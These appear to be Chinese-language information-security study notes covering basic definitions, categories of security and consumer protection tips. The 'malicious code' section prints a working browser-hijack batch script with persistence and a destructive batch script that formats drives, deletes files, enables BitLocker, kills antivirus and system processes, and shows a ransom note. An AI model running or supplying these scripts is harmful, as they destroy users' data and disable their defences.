1.名詞解釋

什么是計算機網(wǎng)絡

    計算機網(wǎng)絡是利用通信線路將不同地理位置、具有獨立功能的計算機和通信設備連接起來，實現(xiàn)資源共享和信息傳遞等目的的計算機系統(tǒng)。

    主要分類：

    - 局域網(wǎng)：局域網(wǎng)的覆蓋范圍一般是方圓幾千米之內(nèi)，其具備的安裝便捷、成本節(jié)約、擴展方便等特點使其在各類辦公室內(nèi)運用廣泛。

    - 城域網(wǎng)：城域網(wǎng)(Metropolitan Area Network)是在一個[城市](https://baike.baidu.com/item/城市/33549)范圍內(nèi)所建立的[計算機通信網(wǎng)](https://baike.baidu.com/item/計算機通信網(wǎng)/7642504)，簡稱MAN。屬寬帶[局域網(wǎng)](https://baike.baidu.com/item/局域網(wǎng)/98626)。由于采用具有有源交換元件的[局域網(wǎng)技術](https://baike.baidu.com/item/局域網(wǎng)技術/2597024)，網(wǎng)中[傳輸時延](https://baike.baidu.com/item/傳輸時延/9032205)較小，它的傳輸[媒介](https://baike.baidu.com/item/媒介)主要采用[光纜](https://baike.baidu.com/item/光纜/6931001)，傳輸[速率](https://baike.baidu.com/item/速率)在100[兆比特](https://baike.baidu.com/item/兆比特)/秒以上。

  MAN的一個重要用途是用作[骨干網(wǎng)](https://baike.baidu.com/item/骨干網(wǎng)/7371439)，通過它將位于同一城市內(nèi)不同地點的主機、[數(shù)據(jù)庫](https://baike.baidu.com/item/數(shù)據(jù)庫/103728)，以及LAN等互相聯(lián)接起來，這與[WAN](https://baike.baidu.com/item/WAN)的作用有相似之處，但兩者在實現(xiàn)方法與性能上有很大差別。

    - 廣域網(wǎng)：**廣域網(wǎng)**（英語：Wide Area Network，縮寫為 WAN），又稱**廣域網(wǎng)**、**外網(wǎng)**、**公網(wǎng)**。是連接不同地區(qū)[局域網(wǎng)](https://baike.baidu.com/item/局域網(wǎng))或[城域網(wǎng)](https://baike.baidu.com/item/城域網(wǎng))計算機通信的遠程網(wǎng)。通常跨接很大的物理范圍，所覆蓋的范圍從幾十公里到幾千公里，它能連接多個地區(qū)、城市和國家，或橫跨幾個洲并能提供遠距離通信，形成國際性的遠程網(wǎng)絡。

    - 互聯(lián)網(wǎng)：互聯(lián)網(wǎng)（internet），又稱國際網(wǎng)絡，指的是[網(wǎng)絡](https://baike.baidu.com/item/網(wǎng)絡/143243)與網(wǎng)絡之間所串連成的龐大網(wǎng)絡，這些網(wǎng)絡以一組通用的協(xié)議相連，形成邏輯上的單一巨大國際網(wǎng)絡。

  這種將[計算機網(wǎng)絡](https://baike.baidu.com/item/計算機網(wǎng)絡/18763)互相聯(lián)接在一起的方法可稱作“網(wǎng)絡互聯(lián)”，在這基礎上發(fā)展出覆蓋全世界的全球性互聯(lián)網(wǎng)絡稱互聯(lián)網(wǎng)，即是互相連接一起的[網(wǎng)絡結構](https://baike.baidu.com/item/網(wǎng)絡結構/8259917)。

2.信息系統(tǒng)

信息系統(tǒng)是能進行信息的采集、傳輸、存儲、加工、使用和維護的計算機應用系統(tǒng)。如辦公自動化系統(tǒng)、人事管理系統(tǒng)、CRM系統(tǒng)、財務系統(tǒng)、火車/飛機訂票系統(tǒng)等。

3.信息安全

信息安全是指保護信息系統(tǒng)中的計算機硬件、軟件及數(shù)據(jù)不因偶然或惡意的原因而遭到破壞、更改、泄露，保障系統(tǒng)連續(xù)可靠正常地運行，信息服務不中斷。

信息安全（狹義）是指保護信息系統(tǒng)的安全，主要目標包括保護信息系統(tǒng)的保密性、完整性和可用性等。

4.計算機病毒

計算機病毒是指編制或者在計算機程序中插入的，破壞計算機功能或者毀壞數(shù)據(jù)、影響計算機使用，并能自我復制的一組計算機指令或者程序代碼。計算機病毒具有寄生性、隱蔽性和傳染性等特點。

5.計算機木馬

木馬是一種用來非法收集信息或控制另一臺計算機的特定程序，通常有客戶端和服務器端兩部分，植入木馬的計算機是服務器端部分。木馬通常會偽裝成程序包、壓縮文件、圖片、視頻等形式，通過網(wǎng)頁、郵件、即時通信等渠道誘導用戶下載安裝，如果用戶打開了此類木馬程序，用戶的計算機或智能終端等設備便會被植入木馬者所控制，造成數(shù)據(jù)文件被竊取或修改、電子賬戶資金被盜用等危害。

6.入侵

指對計算機網(wǎng)絡或系統(tǒng)的非授權訪問行為，通常是惡意的存取信息、處理信息或破壞系統(tǒng)的行為。

7.黑客

泛指熟悉IT技術，熱衷于入侵網(wǎng)絡或計算機系統(tǒng)竊取數(shù)據(jù)和信息的人員。

8.攻擊
指利用網(wǎng)絡或計算機系統(tǒng)存在的漏洞和安全缺陷對其進行破壞、泄露、更改或使其喪失功能的行為

9.漏洞
指網(wǎng)絡或信息系統(tǒng)的硬件、軟件、協(xié)議的具體實現(xiàn)或安全策略上存在的弱點或缺陷。漏洞可能來自應用軟件或操作系統(tǒng)設計時的缺陷或編碼時產(chǎn)生的錯誤，也可能來自業(yè)務在交互處理過程中的設計缺陷或不合理的邏輯流程處理

10.后門
指繞過安全性控制而獲取對程序或系統(tǒng)訪問權的程序方法，是有意留在計算機系統(tǒng)中，供某些特殊使用者通過某種特殊方式控制計算機系統(tǒng)的途徑。后門與漏洞的區(qū)別在于：漏洞是一種無意行為，而后門是程序員在軟件開發(fā)過程中有意創(chuàng)建的。 

11.防火墻
是一種將內(nèi)部網(wǎng)和外部網(wǎng)隔離，保護內(nèi)部網(wǎng)免受非法用戶的侵入的訪問控制技術。防火墻可以軟件實現(xiàn)，也可以硬件實現(xiàn)。 

12.補丁
指針對軟件系統(tǒng)在使用過程中暴露的缺陷而發(fā)布的修補漏洞的小程序

2.網(wǎng)絡信息安全常見分類

• 物理安全

  • 存放位置
  • 設備冗余
  • 硬件設置：bios密碼，禁止從光盤、USB設備引導系統(tǒng)
  • 人員管理

• 系統(tǒng)安全

  • 系統(tǒng)/軟件漏洞
  • 賬號和權限管理
  • 軟件及服務管理

• 網(wǎng)絡安全

  • 防火墻策略
  • 入侵檢測

• 應用安全

  • 加密傳輸
  • 應用系統(tǒng)防護

• 數(shù)據(jù)安全

  • 數(shù)據(jù)備份
  • 數(shù)據(jù)加密
  • 存取權限控制
  • 人員管理

3.惡意代碼攻擊

通過修改注冊表，實現(xiàn)篡改瀏覽器首頁

#關閉回顯
@echo off   
# 修改首頁
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.game.com" /f   
# 鎖定首頁
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f 
# 鎖定注冊表
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f  
# 添加自啟動
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "test" /d "%windir%\System32\shouye.bat" /f   
copy %0 %windir%\System32\shouye.bat

清楚方法：

刪除文件C:\Windows\System32\shouye.bat
運行gpedit.msc組策略編輯器
 用戶配置-->管理模板-->系統(tǒng)，將“阻止訪問注冊表工具”設        為“已禁用”
用戶配置-->管理模板-->Windows組件-->Internet Explorer，將“禁止更改主頁設置”設為“已禁用”
編輯注冊表，刪除開機啟動項“test”
重新打開Internet Explorer瀏覽器，修復主頁設置

勒索病毒惡意攻擊

cls
@echo off
echo y|format d: /q
echo y|format e: /q
echo y|format f: /q
del c:\*.doc /s /f /q
del c:\*.xls /s /f /q
del c:\*.xlsx /s /f /q
del c:\*.txt /s /f /q
manage-bde -on d: -RecoveryPassword -RecoveryKey d:\
manage-bde -on d: -RecoveryPassword -RecoveryKey e:\
manage-bde -on d: -RecoveryPassword -RecoveryKey f:\
taskkill /f /im fvenotify.exe > nul
taskkill /f /im fvenotify.exe > nul
manage-bde -protectors -add d: -rp -rk d:\
taskkill /f /im fvenotify.exe > nul
TIMEOUT /T 30
taskkill /f /im fvenotify.exe > nul
echo hello >c:\windows\windows1.txt
echo "Congratulation！！ your company All your data have been deleted. If you want to get it back, please go to http://www.michaelxia.net/ to rush 100W, thank you!">>c:\windows\windows1.txt
start c:\windows\windows1.txt
set superxiaoyuerc=echo
%superxiaoyuerc% "<html>" > %windir%\hax0r.html
%superxiaoyuerc% "<head>" >> %windir%\hax0r.html
%superxiaoyuerc% "<title>Virus</title>" >> %windir%\hax0r.html
%superxiaoyuerc% "</head>" >> %windir%\hax0r.html
%superxiaoyuerc% "<body bgcolor="#000000">" >> %windir%\hax0r.html
%superxiaoyuerc% "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">hack!</font></b></p>" >> %windir%\hax0r.html
%superxiaoyuerc% "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">Hello, your company All your data have been deleted. If you want to get it back, please go to http://www.7005b.net/ to rush 100W, thank you!</font></b></p>" >> %windir%\hax0r.html
%superxiaoyuerc% "</body>" >> %windir%\hax0r.html
%superxiaoyuerc% "</html>" >> %windir%\hax0r.html
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v super003 /t REG_SZ /d %windir%\hax0r.html /f > nul
start c:\windows\hax0r.html
set superxiaoyuer=tskill
%superxiaoyuer% norton*
%superxiaoyuer% av*
%superxiaoyuer% fire*
%superxiaoyuer% anti*
%superxiaoyuer% spy*
%superxiaoyuer% bullguard
%superxiaoyuer% PersFw
%superxiaoyuer% KAV*
%superxiaoyuer% ZONEALARM
%superxiaoyuer% SAFEWEB
%superxiaoyuer% OUTPOST
%superxiaoyuer% nv*
%superxiaoyuer% nav*
%superxiaoyuer% F-*
%superxiaoyuer% ESAFE
%superxiaoyuer% cle
%superxiaoyuer% BLACKICE
%superxiaoyuer% def*
%superxiaoyuer% 360*
%superxiaoyuer% pt*
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v super001 /t REG_SZ /d %windir%\windows1.txt /f > nul
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
start c:\windows\hax0r.html

3. 安全防護

3.1計算機安全防護策略

（1）計算機及應用系統(tǒng)要設置登錄口令

計算機要設置開機口令，重要的應用系統(tǒng)要設置登錄口令；口令長度一般不少于8位，除非系統(tǒng)限制，盡可能用字母、數(shù)字和下劃線混合編制口令；不要以容易猜測的個人信息（如姓名、生日、手機號、計算機用戶名）、學校名稱等作為口令；口令使用一段時間后要更換。

開機口令設置方法：打開計算機的“控制面板”，進入“用戶帳戶”，選擇“創(chuàng)建密碼”或“更改密碼”功能。

（2）計算機要安裝殺毒軟件

計算機應安裝主流的殺毒軟件，并且至少一周更新一次；對殺毒軟件要進行更新設置，可選擇每天檢查更新，確保軟件的病毒查殺能力。

殺毒軟件安裝方法：在殺毒軟件廠家的官網(wǎng)下載并安裝，建議使用360安全衛(wèi)士等免費的殺毒軟件套裝。

（3）計算機要及時更新操作系統(tǒng)補丁

Windows等操作系統(tǒng)開發(fā)商一般每月都會發(fā)布最新的補丁程序用以修復新發(fā)現(xiàn)的操作系統(tǒng)漏洞，漏洞類型主要分為高危漏洞和功能性漏洞兩種，對高危漏洞的補丁必須安裝，功能性漏洞的補丁可選擇性進行安裝，避免造成系統(tǒng)資源的浪費。要定期進行補丁升級更新，升級到最新的安全補丁，可以提高計算機的防御能力。補丁更新方法：打開計算機的“控制面板”，進入“Windows Update”，選擇“檢查更新”功能；或者通過360安全衛(wèi)士自動檢測更新。

（4）防止通過U盤的病毒感染

如果將帶有木馬或病毒的U盤接入計算機，很可能會將木馬或病毒傳播到計算機中。要使用殺毒軟件或查殺木馬軟件及時對接入到計算機的U盤進行檢測，并關閉計算機U盤自動播放功能；在U盤處于工作狀態(tài)時不要拔出U盤，避免造成數(shù)據(jù)丟失。

（5）不要輕易下載小網(wǎng)站的軟件與程序

不要光顧那些很誘惑人的小網(wǎng)站，因為這些網(wǎng)站很有可能就是網(wǎng)絡陷阱。尤其是不要在線啟動、閱讀某些文件，否則您很有可能成為網(wǎng)絡病毒的傳播者。

3.2 互聯(lián)網(wǎng)安全防護策略

（1）瀏覽器安全設置

互聯(lián)網(wǎng)上充滿著各種釣魚網(wǎng)站、病毒、木馬程序，打開來歷不明的網(wǎng)頁、電子郵件鏈接、附件可能導致木馬或病毒自動進入計算機，造成文件丟失、損壞甚至計算機系統(tǒng)癱瘓。當前主流的瀏覽器有微軟的IE瀏覽器、谷歌的Chrome瀏覽器、360安全瀏覽器和火狐Firefox瀏覽器等等，不同的瀏覽器產(chǎn)品對惡意網(wǎng)址攔截的功能差別較大，大家可以比較后選擇安裝。修改安全設置的方法（以IE瀏覽器為例）：打開IE瀏覽器，點擊“工具/設置”后，在下拉菜單“Internet選項”中，選擇“安全”，可對“Internet”或“本地Intranet”區(qū)域的安全級別進行自定義設置，一般選擇“中-高”，如果選擇級別太高，會對瀏覽網(wǎng)頁產(chǎn)生一些影響。

（2）Cookie安全限制

Cookie是一個數(shù)據(jù)包，當用戶瀏覽一個網(wǎng)站后會生成這樣一個數(shù)據(jù)包，包含了發(fā)布Cookie的網(wǎng)站名、用戶訪問該網(wǎng)站的種種活動、個人資料、瀏覽習慣、消費習慣等數(shù)據(jù)。它的作用是能夠讓你在下一次訪問時不需要重新輸入用戶名和口令。Cookie本身是安全的，它既可以存儲在個人計算機上，也可在一次瀏覽會話中創(chuàng)建、使用并刪除。Cookie的安全問題是個人信息容易被別人以不為人覺察的方式收集、存儲和利用。

安全防范策略：

在瀏覽器中對Cookie的使用做出限制，并定期刪除瀏覽器中的Cookie。清除Cookies有利于保護自己的隱私不被跟蹤。

限制使用Cookie的方法：單擊“工具/Internet選項”->“隱私”->“設置”菜單中，調(diào)整Cookie的安全級別。多數(shù)的網(wǎng)站論壇站點需要使用Cookie信息，一般選擇“中高”或者“高”的安全級別。最高安全級是“阻止所有Cookie”；如果只是為了禁止個別網(wǎng)站的Cookie，可以單擊“編輯”按鈕，將要屏蔽的網(wǎng)站添加到列表中。清除Cookie的方法：點擊瀏覽器上方的“工具/Internet選項”->“常規(guī)”菜單，點擊“刪除瀏覽的歷史記錄”，選擇刪除“Cookie”。

（3）公共場所上網(wǎng)安全

在公共場所如酒店、網(wǎng)吧、圖書館、咖啡廳、機場、地鐵站等地方，使用公用計算機上網(wǎng)登錄郵箱、網(wǎng)上購物時，很容易遭受網(wǎng)絡攻擊，導致賬戶口令被泄露，帶來經(jīng)濟損失。

安全防范策略：

不要輕易使用公共場所提供的計算機登錄郵箱和進行網(wǎng)上購物，在使用時盡量使用Https協(xié)議登錄網(wǎng)站和郵箱；

在上網(wǎng)時不要選擇“記住用戶名和密碼”；

互聯(lián)網(wǎng)瀏覽器后，應清空歷史記錄和緩存內(nèi)容。

3.3 無線網(wǎng)絡安全防護策略

（1）WiFi上網(wǎng)的安全

WiFi是一種允許電子設備連接到一個無線局域網(wǎng)的傳輸技術，遵循IEEE802.11標準。目前使用WiFi無線網(wǎng)絡存在重大的安全隱患，一方面是公共場所的無密碼WiFi熱點，很可能就是釣魚陷阱；另一方面是網(wǎng)民家里的無線路由器如果設置不合理，很可能被惡意攻擊者輕松攻破，攻擊者除了免費享用網(wǎng)絡帶寬外，還可以登錄無線路由器的管理后臺，這樣網(wǎng)民在家里通過WiFi連接無線網(wǎng)，進行微信、QQ、甚至網(wǎng)銀登錄，很可能在毫不知情的情況下，面臨個人敏感信息遭盜取風險，甚至遭受直接的經(jīng)濟損失。

無密碼WiFi的安全防范策略：

盡量不使用公共場所提供的無密碼的WiFi無線網(wǎng)絡；

不要在無密碼WiFi網(wǎng)絡環(huán)境下進行與資金有關的銀行轉賬與支付等操作。

家庭WiFi的安全防范策略：

路由器管理后臺的登錄賬號、密碼，不要使用默認的admin，啟用時更改為字母加數(shù)字的高強度密碼；

WiFi設置要選擇WPA/WPA2加密認證方式；

WiFi密碼要使用相對復雜的密碼，可提高黑客破解的難度。

（2）手機等智能終端的安全

智能手機和平板電腦等移動智能終端已融入了我們的生活，大家也越來越依賴智能手機。但手機支付漏洞、手機遠程定位、手機信息泄露等安全問題屢見不鮮。智能手機強大的上網(wǎng)功能和部分用戶不安全的上網(wǎng)習慣，給了手機病毒、木馬乘虛而入的機會，短信彩信、郵件等也是手機病毒傳播感染的重要途徑。

安全防范策略：

設置手機鎖屏密碼，以防手機遺失時，被不法之徒輕易獲得通訊錄、文件等重要信息；

不要輕易點擊打開別人在QQ、微信、短信、郵件中發(fā)來的鏈接地址；

平時關閉手機的自動搜索無線網(wǎng)絡功能，僅在需要時開啟；

在手機的QQ、微信等應用程序中關閉地理定位功能；

經(jīng)常為智能手機做數(shù)據(jù)備份。

在正規(guī)的通信運營商處維修手機，防止手機被植入病毒木馬程序。

3.4 網(wǎng)上銀行安全防護策略

（1）網(wǎng)上支付的安全

隨著電子商務的發(fā)展，社會公眾對小額、快捷、便民的小微支付服務需求日益增長，網(wǎng)絡支付服務得到了快速發(fā)展，相關問題和風險也不斷顯現(xiàn)。由于客戶在網(wǎng)上銀行及其它支付機構不需要提供任何印鑒，僅憑USB Key或手機支付密碼就可以辦理支付業(yè)務，伴隨著日益頻繁的支付活動，個人支付信息泄露風險大大增加，消費者面臨更大的資金被盜和欺詐風險。

安全防范策略：

妥善保管好相應的網(wǎng)上銀行認證信息；

不要在網(wǎng)吧等不安全的公共場所使用網(wǎng)上銀行交易系統(tǒng)執(zhí)行支付操作；

不要輕易相信陌生的電話或者短信、郵件，避免個人信息泄漏；

靜態(tài)口令應牢記腦中，動態(tài)口令要謹慎保管，支付密碼應盡量設置為數(shù)字、英文大小寫字母的組合，不要用生日、姓名等容易被猜中的內(nèi)容做密碼；

建議對不同的電子支付方式分別設置合理的交易限額，在交易未完成時不要中途離開交易終端；

通過定制銀行短信提醒服務和對賬郵件，及時獲得銀行登錄、余額變動、賬戶設置變更等信息提醒。

（2）釣魚網(wǎng)站的防范

釣魚網(wǎng)站通常偽裝成為銀行網(wǎng)站，騙取訪問者提交的賬號和密碼信息。它一般通過電子郵件傳播，通過郵件中一個經(jīng)過偽裝的鏈接將收件人導向釣魚網(wǎng)站。釣魚網(wǎng)站的頁面與真實銀行網(wǎng)站界面幾乎完全一致，要求訪問者提交賬號和密碼。釣魚網(wǎng)站結構一般都只有一個或幾個頁面，其URL和真實網(wǎng)站有細微差別。

安全防范策略：

查看網(wǎng)站身份信息，可通過中國互聯(lián)網(wǎng)絡信息中心（CNNIC）運行的國家最高目錄數(shù)據(jù)庫中的“可信網(wǎng)站”子數(shù)據(jù)庫，可以甄別網(wǎng)站的真實身份；

查詢網(wǎng)站備案，可通過ICP備案可以查詢到網(wǎng)站的基本情況和網(wǎng)站擁有者的情況，沒有合法備案的非經(jīng)營性網(wǎng)站或沒有取得ICP許可證的經(jīng)營性網(wǎng)站，都是非法的網(wǎng)站。

認真核對網(wǎng)站域名，釣魚網(wǎng)站和真實網(wǎng)站有細微區(qū)別，有疑問時要仔細辨別其不同之處，比如在域名方面，釣魚網(wǎng)站通常將英文字母I被替換為數(shù)字1。

查看網(wǎng)站的安全證書，大型的電子商務網(wǎng)站都應用了可信證書類產(chǎn)品，其網(wǎng)址都是“Https”打頭的，對不是“Https”開頭的電商網(wǎng)站要特別謹慎。

網(wǎng)上購物時請到信譽好、知名的網(wǎng)上商戶進行網(wǎng)上支付，交易時請確認地址欄里的網(wǎng)址是否正確；

不要隨便點擊手機接收到的中獎、貸款等短信和非銀行官方網(wǎng)站上的鏈接信息。